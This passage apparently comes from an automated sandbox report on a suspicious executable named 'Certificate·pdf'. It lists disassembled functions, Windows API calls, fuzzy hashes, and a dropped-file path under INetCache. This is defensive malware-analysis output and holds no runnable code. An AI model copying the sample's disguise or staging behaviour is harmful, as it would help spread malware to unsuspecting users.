          • Associated: 00000000.00000002.23340912487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23340965335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007C8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341761650.00000000007CB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_Certificate#U00b7pdf.jbxd
          Similarity
          • API ID: Message$Send$ClientScreen
          • String ID: f
          • API String ID: 41195575-1993550816
          • Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
          • Instruction ID: e2d68be7770c43893e1e2478522bb0d44a2fa382b0b36792216c84cf33d7cb12
          • Opcode Fuzzy Hash: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
          • Instruction Fuzzy Hash: 6F015E71D00218BAEB00DB94DD85BFFBBBCAF95B11F10412BBA51B61D0C7B49A018BA4
          APIs
          • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402E11
          • MulDiv.KERNEL32(00024200,00000064,00065328), ref: 00402E3C
          • wsprintfW.USER32 ref: 00402E4C
          • SetWindowTextW.USER32(?,?), ref: 00402E5C
          • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E6E
          Strings
          • verifying installer: %d%%, xrefs: 00402E46
          Memory Dump Source
          • Source File: 00000000.00000002.23340938665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.23340912487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23340965335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007C8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341761650.00000000007CB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_Certificate#U00b7pdf.jbxd
          Similarity
          • API ID: Text$ItemTimerWindowwsprintf
          • String ID: verifying installer: %d%%
          • API String ID: 1451636040-82062127
          • Opcode ID: 1a328351c5421bd6383489faae0abdae529a3cf17d73acb180239156b2535a4a
          • Instruction ID: 3b7df5e00b9d055b55134e233a6447c2e1405f162d6c23549fa63679cea1b34f
          • Opcode Fuzzy Hash: 1a328351c5421bd6383489faae0abdae529a3cf17d73acb180239156b2535a4a
          • Instruction Fuzzy Hash: 5601677164020CBFDF109F50DD49FAE3B69AB04305F108439FA05B51E0DBB98555CF58
          APIs
          • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402901
          • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 0040291D
          • GlobalFree.KERNEL32(?), ref: 00402956
          • GlobalFree.KERNEL32(00000000), ref: 00402969
          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402981
          • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402995
          Memory Dump Source
          • Source File: 00000000.00000002.23340938665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.23340912487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23340965335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007C8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341761650.00000000007CB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_Certificate#U00b7pdf.jbxd
          Similarity
          • API ID: Global$AllocFree$CloseDeleteFileHandle
          • String ID:
          • API String ID: 2667972263-0
          • Opcode ID: 4c7fd7b1f91375a2558ff4a0a047554b9ac13023ec1a621a7b7447f5a49afdce
          • Instruction ID: 9b62f472eb3a95df078ad497759be9c31f6c15c11f60cf08f6005a6c9cb4e6e4
          • Opcode Fuzzy Hash: 4c7fd7b1f91375a2558ff4a0a047554b9ac13023ec1a621a7b7447f5a49afdce
          • Instruction Fuzzy Hash: 9921BFB1C00128BBCF116FA5DE49D9E7E79EF09364F14423AF960762E0CB794C419B98
          APIs
          • CreateDirectoryW.KERNEL32(?,?,00000000), ref: 00405811
          • GetLastError.KERNEL32 ref: 00405825
          • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 0040583A
          • GetLastError.KERNEL32 ref: 00405844
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.23340938665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.23340912487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23340965335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007C8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341761650.00000000007CB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_Certificate#U00b7pdf.jbxd
          Similarity
          • API ID: ErrorLast$CreateDirectoryFileSecurity
          • String ID: C:\Users\user\Desktop
          • API String ID: 3449924974-3370423016
          • Opcode ID: c7775b55854fc79259119bfc4daa9494171cd7cf58f96f816c013ac7f64a11dc
          • Instruction ID: 32cc50e607dd20b61f2ed470817bc290d965520901a5db6b5155953f1fdd03ed
          • Opcode Fuzzy Hash: c7775b55854fc79259119bfc4daa9494171cd7cf58f96f816c013ac7f64a11dc
          • Instruction Fuzzy Hash: B1010872C10619DADF00AFA1C9447EFBBB8EF14355F00803AD945B6281E77896188FA9
          APIs
          • GetDC.USER32(?), ref: 00401DBC
          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD6
          • MulDiv.KERNEL32(00000000,00000000), ref: 00401DDE
          • ReleaseDC.USER32(?,00000000), ref: 00401DEF
          • CreateFontIndirectW.GDI32(0040CDA8), ref: 00401E3E
          Memory Dump Source
          • Source File: 00000000.00000002.23340938665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.23340912487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23340965335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007C8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341761650.00000000007CB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_Certificate#U00b7pdf.jbxd
          Similarity
          • API ID: CapsCreateDeviceFontIndirectRelease
          • String ID:
          • API String ID: 3808545654-0
          • Opcode ID: 5bd6bd5a0da59a8b862859853f94caf732d3d6ef064c8fd9610db6583930af4a
          • Instruction ID: 8812a6a15301a194985102fbed33e50eefbd915e65da34b8167a76c641a3bf07
          • Opcode Fuzzy Hash: 5bd6bd5a0da59a8b862859853f94caf732d3d6ef064c8fd9610db6583930af4a
          • Instruction Fuzzy Hash: 1B017571948240EFE7406BB4AF8A7D97FB49F95301F10457EE241B71E2CA7804459F2D
          APIs
          • GetDlgItem.USER32(?,?), ref: 00401D63
          • GetClientRect.USER32(00000000,?), ref: 00401D70
          • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D91
          • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D9F
          • DeleteObject.GDI32(00000000), ref: 00401DAE
          Memory Dump Source
          • Source File: 00000000.00000002.23340938665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.23340912487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23340965335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007C8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341761650.00000000007CB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_Certificate#U00b7pdf.jbxd
          Similarity
          • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
          • String ID:
          • API String ID: 1849352358-0
          • Opcode ID: af37ea9ba388a84de559cbd8ec297e57ada735495d371533b97794bde5efee3a
          • Instruction ID: 7e4da700d615158f321032e6dee441e0afa22e46251462cde10931eea5e4b44d
          • Opcode Fuzzy Hash: af37ea9ba388a84de559cbd8ec297e57ada735495d371533b97794bde5efee3a
          • Instruction Fuzzy Hash: 59F0EC72A04518AFDB41DBE4DE88CEEB7BCEB48301B14446AF641F61A0CA749D519B38
          APIs
          • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C8F
          • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA7
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.23340938665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.23340912487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23340965335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007C8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341761650.00000000007CB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_Certificate#U00b7pdf.jbxd
          Similarity
          • API ID: MessageSend$Timeout
          • String ID: !
          • API String ID: 1777923405-2657877971
          • Opcode ID: 3974eff3514ac80dd6c1aa8123252385dbc5481e5078a21275b56949e15273d0
          • Instruction ID: 5915ba61491c244e76e1eaab0aa102c6a5e0f3d841db56a12d121f6c77e1b82d
          • Opcode Fuzzy Hash: 3974eff3514ac80dd6c1aa8123252385dbc5481e5078a21275b56949e15273d0
          • Instruction Fuzzy Hash: E621C371948209AEEF049FB5DE4AABE7BB4EF84304F14443EF605F61D0D7B889409B18
          APIs
          • lstrlenW.KERNEL32(007A1F20,007A1F20,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B5C
          • wsprintfW.USER32 ref: 00404B65
          • SetDlgItemTextW.USER32(?,007A1F20), ref: 00404B78
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.23340938665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.23340912487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23340965335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007C8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341761650.00000000007CB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_Certificate#U00b7pdf.jbxd
          Similarity
          • API ID: ItemTextlstrlenwsprintf
          • String ID: %u.%u%s%s
          • API String ID: 3540041739-3551169577
          • Opcode ID: e544acf4f0842c60a9c18385703c419e840f736fd1e164df9e130a51ba0441a7
          • Instruction ID: c6a8333de7f2a0e63f9e82a7fb0d3590b97a2c0368f8d4fe0eecd184368e2ceb
          • Opcode Fuzzy Hash: e544acf4f0842c60a9c18385703c419e840f736fd1e164df9e130a51ba0441a7
          • Instruction Fuzzy Hash: 5711DB736041282BDB00656D9C41F9E329CDB86334F15423BFB25F21D1D978DC1186E8
          APIs
          • WideCharToMultiByte.KERNEL32(?,?,0040B5A8,000000FF,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Penetrometer\Transiter\Salenes\Tilrakket.Ove,00000400,?,?,00000021), ref: 004025E8
          • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Penetrometer\Transiter\Salenes\Tilrakket.Ove,?,?,0040B5A8,000000FF,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Penetrometer\Transiter\Salenes\Tilrakket.Ove,00000400,?,?,00000021), ref: 004025F3
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.23340938665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.23340912487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23340965335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007C8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341761650.00000000007CB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_Certificate#U00b7pdf.jbxd
          Similarity
          • API ID: ByteCharMultiWidelstrlen
          • String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Penetrometer\Transiter\Salenes\Tilrakket.Ove
          • API String ID: 3109718747-3189326397
          • Opcode ID: bac47df6fb5c15672e847bcd90d072063b8e9d74f7c5b2892f2d21255f34aeb3
          • Instruction ID: 4bb1670e371a3de23f361dcee459543bcfcf4636ee0f51b5b5a9e7d0ab821041
          • Opcode Fuzzy Hash: bac47df6fb5c15672e847bcd90d072063b8e9d74f7c5b2892f2d21255f34aeb3
          • Instruction Fuzzy Hash: DB11CB72A05300BEDB046FB18E8999F7664AF54399F20843FF502F61D1D9FC89415B5E
          APIs
          • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403359,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,77143420,004035B6,?,00000006,00000008,0000000A), ref: 00405B72
          • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403359,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,77143420,004035B6,?,00000006,00000008,0000000A), ref: 00405B7C
          • lstrcatW.KERNEL32(?,0040A014), ref: 00405B8E
          Strings
          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405B6C
          Memory Dump Source
          • Source File: 00000000.00000002.23340938665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.23340912487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23340965335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007C8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341761650.00000000007CB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_Certificate#U00b7pdf.jbxd
          Similarity
          • API ID: CharPrevlstrcatlstrlen
          • String ID: C:\Users\user\AppData\Local\Temp\
          • API String ID: 2659869361-3355392842
          • Opcode ID: cc3b6fad2320eb0d125534955cb1fe8af3638bf69e103b669ecb1462063790d4
          • Instruction ID: 803477e47080facc391f0cecd2807ccdb00b9d1fdb40608b9d44cb66137c19bb
          • Opcode Fuzzy Hash: cc3b6fad2320eb0d125534955cb1fe8af3638bf69e103b669ecb1462063790d4
          • Instruction Fuzzy Hash: 3BD0A731501A30AAC111BB449D04DDF72ACDE45304342047FF101B31A2C7BC2D5287FD
          APIs
          • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402DA9
          • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DB2
          • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DD3
          Memory Dump Source
          • Source File: 00000000.00000002.23340938665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.23340912487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23340965335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.00000000007C8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341761650.00000000007CB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_Certificate#U00b7pdf.jbxd
          Similarity
          • API ID: Close$Enum
          • String ID:
          • API String ID: 464197530-0
          • Opcode ID: a4e23b119c2c64eb18a4fa0724f9b8d9fe0ec592ff9815e45bdb7592abe1cef3
          • Instruction ID: 4ebe2cb43181949e29f1e9fb79ae388d5d3e17bd3db4e8cfc4c1202d027f6d8e
          • Opcode Fuzzy Hash: a4e23b119c2c64eb18a4fa0724f9b8d9fe0ec592ff9815e45bdb7592abe1cef3
          • Instruction Fuzzy Hash: FB116A32500108FBDF02AB90CE49FEE7B7DAF44340F110076B905B51E1E7B59E21AB58
          APIs
          • DestroyWindow.USER32(00000000,00000000,00403059,00000001,?,00000006,00000008,0000000A), ref: 00402E8C
          • GetTickCount.KERNEL32 ref: 00402EAA
          • CreateDialogParamW.USER32(0000006F,00000000,00402DF3,00000000), ref: 00402EC7
          • ShowWindow.USER32(00000000,00000005,?,00000006,00000008,0000000A), ref: 00402ED5
          Memory Dump Source
          • Source File: 00000000.00000002.23340938665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.23340912487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23340965335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.23341017704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
